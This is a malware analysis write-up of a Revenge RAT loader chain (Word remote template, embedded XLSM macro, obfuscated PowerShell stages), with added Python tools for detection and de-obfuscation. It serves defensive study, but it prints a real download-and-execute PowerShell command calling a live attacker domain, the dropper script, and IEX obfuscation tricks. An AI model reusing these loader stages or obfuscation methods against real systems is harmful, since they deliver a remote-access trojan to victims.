Revenge RAT loader analysis (Word remote template loading)


This Wind


Reference link: https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america

VirusTotal detection results


Initial file


Method: Office VBA remote template loading


One of the templates at http://azulviagens.online/1-9.docx is loaded at random, then downloaded and executed.
Every one of these files has the same content (same SHA-256: 338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9).


Template file

The template files ("1.docx" ... "9x.docx") follow the structure shown in Figure 4 (below). In this structure, settings.xml has a "Target" field pointing to an XLSM file that sits in the "embeddings" directory of the DOCX package. The XLSM files "Microsoft_Excel_Macro-Enabled_Worksheet.xlsm" through "Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm" all have the same content (same SHA-256: 32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2). When Microsoft Word executes one of the template files ("1.docx" ... "9x.docx"), it executes one of the XLSM files ("Microsoft_Excel_Macro-Enabled_Worksheet.xlsm" through "Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm").
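As an added example (not from the original post), a small Python check for the structure described above: it opens a DOCX, reads word/_rels/settings.xml.rels for attachedTemplate relationships (reporting whether the Target is external, as in the first-stage document, or points into the package, as in the template files) and lists macro-enabled files under word/embeddings. The sample document it builds is constructed for the test; only the embedded worksheet name mirrors the campaign.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
MACRO_EXTS = (".xlsm", ".xlam", ".docm", ".dotm")


def scan_docx(data: bytes) -> dict:
    """Return attachedTemplate targets (with TargetMode) and embedded macro-enabled files."""
    findings = {"attached_templates": [], "embedded_macro_files": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        rels = "word/_rels/settings.xml.rels"
        if rels in names:
            root = ET.fromstring(z.read(rels))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("Type") == ATTACHED_TEMPLATE:
                    findings["attached_templates"].append(
                        (rel.get("Target"), rel.get("TargetMode", "Internal")))
        findings["embedded_macro_files"] = [
            n for n in names
            if n.startswith("word/embeddings/") and n.lower().endswith(MACRO_EXTS)]
    return findings


def is_suspicious(findings: dict) -> bool:
    """Flag an external attachedTemplate (remote template load) or any embedded macro file."""
    return any(mode == "External" for _, mode in findings["attached_templates"]) \
        or bool(findings["embedded_macro_files"])


def build_sample_docx(template_target: str, external: bool, embed_xlsm: bool) -> bytes:
    """Constructed minimal DOCX skeleton for testing (not a document from the campaign)."""
    mode = ' TargetMode="External"' if external else ""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_target}"{mode}/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
        if embed_xlsm:
            # placeholder bytes: only the name and location matter for this check
            z.writestr("word/embeddings/Microsoft_Excel_Macro-Enabled_Worksheet.xlsm", b"PK")
    return buf.getvalue()
```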


XLSM file inside the docx template


Any one of the xlsm files under the word/embeddings directory


xlsm file

This structure contains the macro inside the "VBAProject.bin" file. The following screenshot shows the stream that holds the macro. Extracting the macro with olevba:

```vb
Dim Program As String, TaskID As Double
' both command lines are assembled from UserForm control properties, so olevba only sees property reads
Program = UserForm1.Image1.ControlTipText + UserForm1.Frame1.Tag + UserForm1.TabStrip1.ControlTipText + UserForm1.ScrollBar1.Tag
Program01 = UserForm2.Image1.Tag + UserForm2.Frame1.ControlTipText

On Error Resume Next
AppActivate "UserForm1"
If Err <> 0 Then
    Err = 0
    TaskID = Shell(Program, 0)     ' PowerShell  -ex Bypass -nOp -w 1 iex(iwr('http://azulviagens.online/A.txt'))
    TaskID01 = Shell(Program01, 0) ' taskkill  /f /im WINWORD.EXE
    If Err <> 0 Then MsgBox "Can't start " & Program
End If
End Sub
```

UserForm1.Image1.ControlTipText is not visible in olevba, because the program is executed through the Shell function. Monitoring with Huorong Sword (火绒剑) captured what was actually run:



(calls PowerShell to download and execute remotely)



(kills the WINWORD.exe process)

http://azulviagens.online/A.txt had already gone offline at the time of reproduction; according to the screenshot in the original article, it was as follows:

```powershell
$ProcName="index.vbs"
$WebFile="http://azulviagens.online/index.mp3"
C'l'e'a'r'-'H'o's't'
(N'e'W-'O'b'j'e'c't' S'y's't'e'm'.'N'e't'.'W'e'b'C'l'ient).DownloadFile($WebFile,"$env:APPDATA\$ProcName") # saved to C:\Users\<Username>\AppData\Roaming\index.vbs
S't'a'r't'-'P'r'o'c'e's's ("$env:APPDATA\$ProcName") # runs C:\Users\<Username>\AppData\Roaming\index.vbs
```

Finally index.vbs is run; index.vbs then downloads /1.txt remotely, saves it as Opera.vbs and runs Opera.vbs.


The last stage downloads Opera.ps1 remotely and executes it. The content of the ps1 is as follows, heavily obfuscated:


After manual de-obfuscation, the process is as follows:

```powershell
# Decode 1
$a=iex  (  [CHar]36+[CHar]101  +[CHar]107+[CHar]108+[CHar]116+  [CHar]107+[CHar]116+  [CHar]101  +[CHar]107  +[CHar]100  +  [CHar]107+[CHar]113+  [CHar]106  +  [CHar]102+[CHar]100+[CHar]107  +[CHar]102  +  [CHar]100+[CHar]107+[CHar]102  +[CHar]107  +  [CHar]100  +[CHar]102+[CHar]107  +[CHar]115+  [CHar]100  +[CHar]107+  [CHar]115  +  [CHar]100  +[CHar]107+  [CHar]118  +  [CHar]99  +[CHar]107  +[CHar]107+  [CHar]101  +  [CHar]114  +[CHar]107+[CHar]101  +  [CHar]119  +  [CHar]116  +  [CHar]101  +  [CHar]107+  [CHar]114  +  [CHar]116+  [CHar]101+[CHar]107  +[CHar]121  +  [CHar]101  +  [CHar]107  +  [CHar]119  +[CHar]48  +[CHar]48  +  [CHar]48+  [CHar]48+  [CHar]61+[CHar]45+[CHar]74  +[CHar]111+  [CHar]105+  [CHar]110  +  [CHar]32+  [CHar]40  +[CHar]40+[CHar]49+  [CHar]49  +[CHar]49+[CHar]44  +  [CHar]32  +[CHar]49+[CHar]48+[CHar]53+  [CHar]44+[CHar]32+[CHar]49  +[CHar]51+  [CHar]48+  [CHar]41+  [CHar]124+  [CHar]32  +[CHar]70+[CHar]111+[CHar]114  +[CHar]69+  [CHar]97  +  [CHar]99  +  [CHar]104  +[CHar]45+[CHar]79+  [CHar]98+  [CHar]106+[CHar]101+[CHar]99  +  [CHar]116  +[CHar]32  +[CHar]123  +[CHar]40+[CHar]32+[CHar]91  +  [CHar]67  +[CHar]111+  [CHar]110+[CHar]118+  [CHar]101+[CHar]114+  [CHar]116  +[CHar]93+[CHar]58  +[CHar]58+  [CHar]84  +  [CHar]111+  [CHar]73  +  [CHar]110+  [CHar]116+[CHar]49+  [CHar]54  +[CHar]40  +[CHar]40+[CHar]91  +  [CHar]83+[CHar]116+  [CHar]114  +  [CHar]105+  [CHar]110  +  [CHar]103+[CHar]93+  [CHar]36+  [CHar]95+[CHar]32  +  [CHar]41+  [CHar]44  +  [CHar]32  +  [CHar]56+  [CHar]41+[CHar]32+[CHar]45+[CHar]65  +  [CHar]115+  [CHar]91+[CHar]67  +[CHar]104  +  [CHar]97  +[CHar]114+[CHar]93+[CHar]41+  [CHar]125  +[CHar]41  +[CHar]59  +[CHar]115+[CHar]97  +  [CHar]108+[CHar]32+  [CHar]103  +  [CHar]32+  [CHar]36  +[CHar]101  +  [CHar]107  +[CHar]108+  [CHar]116+  [CHar]107+[CHar]116+[CHar]101  +  [CHar]107  +[CHar]100  +[CHar]107  +  [CHar]113  +[CHar]106+  [CHar]102  +  [CHar]100+[CHar]107  +[CHar]102  +[CHar]100+[CHar]107+[CHar]102+[CHar]107  +[CHar]100  +  [CHar]102  +[CHar]107+  [CHar]115  +  [CHar]100+  [CHar]107  +[CHar]115+  [CHar]100+  [CHar]107  +  [CHar]118  +  [CHar]99  +[CHar]107  +  [CHar]107  +[CHar]101  +  [CHar]114  +  [CHar]107+  [CHar]101+  [CHar]119+  [CHar]116+[CHar]101+  [CHar]107  +  [CHar]114  +  [CHar]116+  [CHar]101  +[CHar]107  +[CHar]121  +[CHar]101  +  [CHar]107  +  [CHar]119+[CHar]48  +[CHar]48+  [CHar]48+[CHar]48  )

# Decode 2
$ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000 # sal is shorthand for Set-Alias

# Decode 3
iex(  [CHar]70+  [CHar]117  +  [CHar]110  +  [CHar]99+  [CHar]116+  [CHar]105  +  [CHar]111+  [CHar]110  +  [CHar]32  +  [CHar]109+  [CHar]97+  [CHar]120+[CHar]100  +[CHar]111+[CHar]111  +[CHar]111  +[CHar]109  +[CHar]32+  [CHar]123+[CHar]13  +[CHar]10+[CHar]32+  [CHar]13+  [CHar]10  +[CHar]32  +[CHar]32+  [CHar]32+[CHar]32  +  [CHar]91  +  [CHar]67+  [CHar]109  +[CHar]100+[CHar]108+  [CHar]101  +  [CHar]116+[CHar]66+[CHar]105+  [CHar]110  +[CHar]100  +[CHar]105+  [CHar]110  +  [CHar]103  +  [CHar]40  +[CHar]41  +  [CHar]93+  [CHar]13  +  [CHar]10  +[CHar]32+  [CHar]32  +  [CHar]32  +  [CHar]32  +[CHar]91  +[CHar]79  +[CHar]117  +[CHar]116+  [CHar]112  +[CHar]117  +[CHar]116  +  [CHar]84+  [CHar]121+  [CHar]112+[CHar]101+  [CHar]40+  [CHar]91  +[CHar]98+  [CHar]121  +  [CHar]116+[CHar]101+[CHar]91  +  [CHar]93+[CHar]93  +[CHar]41+  [CHar]93  +[CHar]13  +  [CHar]10+  [CHar]32+  [CHar]32+  [CHar]32  +  [CHar]32  +[CHar]112+[CHar]97  +[CHar]114  +[CHar]97  +[CHar]109  +[CHar]40  +  [CHar]13  +  [CHar]10  +  [CHar]32+  [CHar]32+  [CHar]32+  [CHar]32+[CHar]32  +[CHar]32+[CHar]32  +[CHar]32  +  [CHar]91  +  [CHar]80+[CHar]97+  [CHar]114  +  [CHar]97  +[CHar]109+[CHar]101+  [CHar]116  +[CHar]101  +  [CHar]114+  [CHar]40+[CHar]77+  [CHar]97  +[CHar]110  +[CHar]100+  [CHar]97+[CHar]116  +[CHar]111  +  [CHar]114  +[CHar]121  +[CHar]61+[CHar]36+  [CHar]116+  [CHar]114+[CHar]117+[CHar]101  +  [CHar]41+[CHar]93  +[CHar]32  +  [CHar]91+  [CHar]83  +  [CHar]116  +[CHar]114+[CHar]105  +[CHar]110+[CHar]103  +  [CHar]93+  [CHar]36+[CHar]122+  [CHar]88+[CHar]97+[CHar]87  +  [CHar]86  +  [CHar]80+[CHar]105+  [CHar]13  +[CHar]10  +  [CHar]32  +  [CHar]32  +  [CHar]32+  [CHar]32+  [CHar]41+[CHar]13  +[CHar]10  +[CHar]32+[CHar]32  +  [CHar]32+[CHar]32  +[CHar]36+[CHar]72+[CHar]116  +[CHar]116+[CHar]108  +[CHar]100+  [CHar]120  +[CHar]120  +  [CHar]49+  [CHar]115+  [CHar]49+  [CHar]115  +[CHar]51  +  [CHar]100+  [CHar]52  +  [CHar]102  +  [CHar]53+[CHar]118+  [CHar]53  +  [CHar]32  +  [CHar]61+[CHar]32  +  [CHar]78  +  [CHar]101  +[CHar]119  +[CHar]45+  [CHar]79  +  [CHar]98  +  [CHar]106  +[CHar]101  +  [CHar]99  +[CHar]116+  [CHar]32+[CHar]45+[CHar]84+  [CHar]121  +[CHar]112  +  [CHar]101  +  [CHar]78  +  [CHar]97+[CHar]109+  [CHar]101+  [CHar]32  +[CHar]98+[CHar]121+[CHar]116+[CHar]101+[CHar]91+[CHar]93  +  [CHar]32  +[CHar]45  +  [CHar]65  +[CHar]114+  [CHar]103+[CHar]117+  [CHar]109  +  [CHar]101+[CHar]110  +  [CHar]116+[CHar]76  +[CHar]105+[CHar]115+[CHar]116  +[CHar]32+[CHar]40  +  [CHar]36  +[CHar]122  +[CHar]88+  [CHar]97  +  [CHar]87+[CHar]86+  [CHar]80+  [CHar]105+  [CHar]46  +[CHar]76  +  [CHar]101+[CHar]110+  [CHar]103  +[CHar]116+  [CHar]104  +  [CHar]32  +[CHar]47  +  [CHar]32+  [CHar]50+  [CHar]41  +  [CHar]13  +  [CHar]10+  [CHar]32  +[CHar]32+[CHar]32  +[CHar]32+  [CHar]102+  [CHar]111  +  [CHar]114  +[CHar]32+  [CHar]40+[CHar]36  +[CHar]105  +[CHar]32  +  [CHar]61  +[CHar]32  +  [CHar]48  +  [CHar]59  +[CHar]32+  [CHar]36  +  [CHar]105  +[CHar]32+  [CHar]45+[CHar]108+[CHar]116  +[CHar]32  +  [CHar]36+[CHar]122+  [CHar]88  +  [CHar]97  +  [CHar]87+  [CHar]86+  [CHar]80  +  [CHar]105+  [CHar]46  +[CHar]76  +  [CHar]101  +[CHar]110  +[CHar]103  +[CHar]116  +[CHar]104+[CHar]59+  [CHar]32+  [CHar]36+  [CHar]105+  [CHar]32+[CHar]43  +[CHar]61+[CHar]32  +[CHar]50  +  [CHar]41  +[CHar]32+[CHar]123+  [CHar]13  +[CHar]10+  [CHar]32  +  [CHar]32+[CHar]32+[CHar]32  +[CHar]32  +[CHar]32  +  [CHar]32  +  [CHar]32  +[CHar]36  +  [CHar]72+[CHar]116+[CHar]116  +[CHar]108+  [CHar]100+  [CHar]120+  [CHar]120  +[CHar]49+  [CHar]115+  [CHar]49  +[CHar]115+  [CHar]51  +  [CHar]100+  [CHar]52+[CHar]102  +[CHar]53+  [CHar]118+[CHar]53  +  [CHar]91+[CHar]36  +  [CHar]105+  [CHar]32+  [CHar]47  +[CHar]32+[CHar]50  +[CHar]93  +[CHar]32+  [CHar]61+[CHar]32+[CHar]91  +[CHar]67+  [CHar]111+  [CHar]110  +[CHar]118  +  [CHar]101+[CHar]114+[CHar]116+[CHar]93  +  [CHar]58+[CHar]58  +  [CHar]84  +  [CHar]111  +[CHar]66+[CHar]121  +[CHar]116+[CHar]101+[CHar]40+  [CHar]36  +  [CHar]122  +  [CHar]88  +[CHar]97  +[CHar]87+  [CHar]86  +  [CHar]80+[CHar]105+[CHar]46  +  [CHar]83+  [CHar]117  +  [CHar]98  +[CHar]115  +[CHar]116  +  [CHar]114+  [CHar]105  +[CHar]110  +[CHar]103  +  [CHar]40+  [CHar]36  +  [CHar]105  +[CHar]44+  [CHar]32  +[CHar]50+  [CHar]41+[CHar]44  +[CHar]32  +  [CHar]49  +[CHar]54  +[CHar]41+  [CHar]13  +[CHar]10  +[CHar]32  +  [CHar]32+[CHar]32+[CHar]32  +  [CHar]125  +[CHar]13+  [CHar]10  +  [CHar]13+  [CHar]10+  [CHar]32  +  [CHar]32+[CHar]32  +[CHar]32  +[CHar]114  +  [CHar]101  +[CHar]116+  [CHar]117+[CHar]114+  [CHar]110+[CHar]32+  [CHar]91+  [CHar]98+  [CHar]121  +[CHar]116+  [CHar]101+[CHar]91  +[CHar]93+  [CHar]93  +  [CHar]36+[CHar]72+[CHar]116  +  [CHar]116+  [CHar]108+[CHar]100+[CHar]120  +[CHar]120+[CHar]49+  [CHar]115+  [CHar]49  +[CHar]115+[CHar]51+  [CHar]100+  [CHar]52+  [CHar]102+  [CHar]53+  [CHar]118+  [CHar]53+[CHar]13  +[CHar]10  +  [CHar]125  )

# Decode 4 (what Decode 3 evaluates to: a hex-string-to-byte-array helper)
Function maxdooom {
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$zXaWVPi
    )
    $Httldxx1s1s3d4f5v5 = New-Object -TypeName byte[] -ArgumentList ($zXaWVPi.Length / 2)
    for ($i = 0; $i -lt $zXaWVPi.Length; $i += 2) {
        $Httldxx1s1s3d4f5v5[$i / 2] = [Convert]::ToByte($zXaWVPi.Substring($i, 2), 16)
    }
    return [byte[]]$Httldxx1s1s3d4f5v5
}
```

Other forms the script uses to invoke IEX:

${````````````````} -> IEX
${!!!} -> IEX
&( ([sTRIng]$vERbOsepreFERENcE)[1,3]+'x'-jOIN'') -> IEX
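The three idioms in the stages above ([CHar]N+[CHar]M concatenation, the -Join/ToInt16(..., 8) octal trick, and sal aliasing of IEX) can be folded statically, without ever running the script. The decoder below is an added example and not part of the original post; the SAMPLE it decodes is constructed in the same style as the stages above and is not the real Opera.ps1.

```python
import re

# Run of [CHar]N+[CHar]M+... (char-code concatenation), case-insensitive as in the sample
CHAR_RUN_RE = re.compile(r"\[char\]\s*\d+(?:\s*\+\s*\[char\]\s*\d+)*", re.IGNORECASE)
CHAR_NUM_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
# -Join ((111, 105, 130)| ForEach-Object {... ToInt16(..., 8) ...}): octal char codes
OCTAL_JOIN_RE = re.compile(
    r"-join\s*\(\(\s*([\d\s,]+?)\s*\)\s*\|\s*foreach-object\s*\{"
    r"[^}]*toint16\([^}]*,\s*8\s*\)[^}]*\}\s*\)", re.IGNORECASE)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
SAL_RE = re.compile(r"\b(?:sal|set-alias)\s+(\w+)\s+\$(\w+)", re.IGNORECASE)


def quote(text: str) -> str:
    """Wrap decoded text as a single-quoted PowerShell literal."""
    return "'" + text.replace("'", "''") + "'"


def fold_char_runs(script: str) -> str:
    """Replace each [CHar]N+[CHar]M run with the string it builds, without executing it."""
    return CHAR_RUN_RE.sub(
        lambda m: quote("".join(chr(int(n)) for n in CHAR_NUM_RE.findall(m.group(0)))), script)


def fold_octal_joins(script: str) -> str:
    """Replace the -Join/ToInt16(..., 8) idiom with the string its octal codes spell."""
    return OCTAL_JOIN_RE.sub(
        lambda m: quote("".join(chr(int(n, 8)) for n in re.split(r"\s*,\s*", m.group(1).strip()))),
        script)


def deobfuscate(script: str, max_rounds: int = 5) -> str:
    """Apply both folds until the text stops changing (each layer may expose the next)."""
    for _ in range(max_rounds):
        folded = fold_octal_joins(fold_char_runs(script))
        if folded == script:
            break
        script = folded
    return script


def resolve_aliases(script: str) -> dict:
    """Map aliases created with sal/Set-Alias to the literal their variable holds (e.g. g -> IEX)."""
    literals = dict(ASSIGN_RE.findall(script))
    return {alias: literals.get(var, "$" + var) for alias, var in SAL_RE.findall(script)}


# Constructed sample in the style of Decode 1/2 above (variable name shortened; not the real script)
INNER = ("$zz=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8)"
         " -As[Char])});sal g $zz")
SAMPLE = "iex(" + "+".join("[CHar]%d" % ord(c) for c in INNER) + ")"
```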

The final result of the obfuscation on the first line is this:


Obfuscation on the fourth line:


Obfuscation on the seventh line:


The ps1 after final decoding:

```powershell
sal g $ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000
[String]$CXCXxcxsderrewrttyrghbvvbc="<BIN_HEX>"
Function maxdooom {
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$zXaWVPi
    )
    $Httldxx1s1s3d4f5v5 = New-Object -TypeName byte[] -ArgumentList ($zXaWVPi.Length / 2)
    for ($i = 0; $i -lt $zXaWVPi.Length; $i += 2) {
        $Httldxx1s1s3d4f5v5[$i / 2] = [Convert]::ToByte($zXaWVPi.Substring($i, 2), 16)
    }
    return [byte[]]$Httldxx1s1s3d4f5v5
}

[String]$Cmder2021="<BIN_HEX>"
```

.NET files

The PE stored in the $CXCXxcxsderrewrttyrghbvvbc variable is Revenge RAT, which was analysed last time, so it is skipped here; analysis link: https://422926799.github.io/posts/43591be7.html


The PE stored in the $Cmder2021 variable reads a resource file and loads it in memory.


Resource file


URLS

http://azulviagens.online
Cdtpitbull.hopto.org


https://422926799.github.io/posts/ac1cf40.html
